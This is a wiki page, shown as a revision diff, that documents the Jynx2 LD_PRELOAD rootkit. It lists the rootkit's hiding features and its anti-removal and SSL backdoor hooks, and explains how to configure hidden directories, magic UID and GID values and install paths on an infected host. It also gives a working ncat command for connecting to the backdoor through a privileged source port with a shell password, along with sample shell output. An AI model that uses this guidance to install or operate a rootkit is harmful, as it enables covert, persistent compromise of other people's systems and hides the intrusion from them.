Difference between revisions of "Jynx Rootkit/2.0"
(→Multi-Factor Authentication) |
(→MULTI-FACTOR AUTHENTICATION) |
||
| Line 110: | Line 110: | ||
</pre> | </pre> | ||
| − | {{ | + | {{warning| Make sure you are using the --ssl flag with ncat, otherwise jynx will not accept the connection}} |
==LIBC_PATH== | ==LIBC_PATH== | ||
Revision as of 02:59, 17 March 2012
|
Jynx2 is an expansion of the original Jynx LD_Preload rootkit written in C with several modifications for multi-factor authentication, a more compatible shell drop, and additional hiding features. |
_ _,.-.' .-.
_ .' |,' ."".| |.""._
( || ,',"". `._`' ` ' `.
`\ | `" .-"`-..` . `.
| `..--.._ | \
_,| _...'_.' ,+. `.
,""'| `...-'..""(__.._ -" `"--.. `.
|`._,' ,' /\ .'""` .'""`. `. | `. \
' / / / || || |.`.`. . | \
`.__,'-._' /|` -"' `-.' \ \ \ `"-' \
' `. / /_| | |'""| | .-""'`'"`-,.-"\ .
. / .\ . / | | `._.' || ,' \ \
' / / |/ /_.-+._`-..--"-. . . \ `
/ /.' ' ,'""'-. `"."'""'`.. |. \ \
/ . | j . . | |\__," |. ` ' \
. | | | | ' | '| | ' ` \ \ .
| | | `.____,' ..____,' | | . \
| | | | ._ _..---._ _,' | . '
| | | | | "" . |`"' \ `.| ' ' ' .
| | | | | | | ` ` . . \ |
| | | | | ' | \ `. | | . |
' ' | | | . ` \ \ | | | |
\ ` | | | . `. | | | |
\ \ ' | ` ' ` `+..|___|___|_........
\ \ \| ' . `. `. |
`. \ . . ` `. `-. .'
_,'`. \' . \ `-.._ `._ ,'
_." `._ `.` | . `._ .
`._ _,`"--`. | . `. |
`-._ ,' | `. `|_
,' | | `. `.
.' __...__.| | \ __..._ _,..,.__ `.
`-`"' `._..--'-.__ .' `-..' ``'"--..-'
`"---'
/$$$$$ /$$ /$$ /$$ /$$
|__ $$ | $$ /$$/|__/ | $$
| $$ /$$ /$$ /$$$$$$$ /$$ /$$ | $$ /$$/ /$$ /$$$$$$
| $$| $$ | $$| $$__ $$| $$ /$$//$$$$$$| $$$$$/ | $$|_ $$_/
/$$ | $$| $$ | $$| $$ \ $$ \ $$$$/|______/| $$ $$ | $$ | $$
| $$ | $$| $$ | $$| $$ | $$ >$$ $$ | $$\ $$ | $$ | $$ /$$
| $$$$$$/| $$$$$$$| $$ | $$ /$$/\ $$ | $$ \ $$| $$ | $$$$/
\______/ \____ $$|__/ |__/|__/ \__/ |__/ \__/|__/ \___/
/$$ | $$
| $$$$$$/
\______/
Contents
Features
- Hiding from netstat
- Hiding from ps/top and /proc
- File hiding
- SSL connect accept() hook
- Multi-factor authentication
- Improved anti-removal features
Archive Contents
[root@ares jynx2]# ls Makefile README config.h jynx2.c packer.sh reality.c
|
|
In this rendition of jynx, two shared libraries are built by the installation process. One, jynx2.so functions as the actual rootkit, while the other, reality.so, functions as a method for the remote access user to be able to see their own files and processes. |
Configuration Options in Config.h
|
Improper configuration of Jynx2 can result in severe system instability, including segmentation faults of nearly every process on the infected host. |
MAGIC_STRING
MAGIC_STRING is the name of the directory that you want to hide from the system.
For example, if you set your magic string to "hiddendir", jynx2 will hide the folder "hiddendir" in the root directory.
|
|
this can be used as a prefix to your main directory, as well as the files in that directory. |
MAGIC_GID and MAGIC_UID
- Similar to the original Jynx Rootkit, Jynx2 will automatically hide processes, files, and connections owned by the magic UID or GID.
REALITY_PATH
This is the path to install reality.so into. By default, Jynx2 will install this into /MAGIC_STRING/reality.so
It is recommended that you set REALITY_PATH to your hidden directory (MAGIC_STRING)
CONFIG_FILE
The CONFIG_FILE defaults to ld.preload.so, which is commonly located in the /etc directory.
MULTI-FACTOR AUTHENTICATION
With Jynx2, the MAGIC_ACK/MAGIC_SEQ authentication method was dropped.
Jynx2 uses two-factor authentication. The first is HIGH_PORT and LOW_PORT, which default to 1020, and 1024 respectively.
This is the first factor of authentication, the source port of your connect client must fall between this port range. Because you have to be root in order to use this port range, this ensures that there will be no random connections that match this criteria.
The second factor in Jynx2 authentication is SHELL_PASSWORD. SHELL_PASSWORD is pretty straightforward, it's the shell password, and should be the first line sent to the backdoor upon connecting.
If we have port 80 backdoored, you would connect like so:
sudo ncat exploit.net 80 -p 1021 --ssl PASSWORDHERE >ls -lia 214473 drwxr-xr-x 2 errprone users 176 Mar 7 19:19 . 177137 drwxr-xr-x 15 errprone users 952 Mar 5 22:15 ..
|
|
Make sure you are using the --ssl flag with ncat, otherwise jynx will not accept the connection |
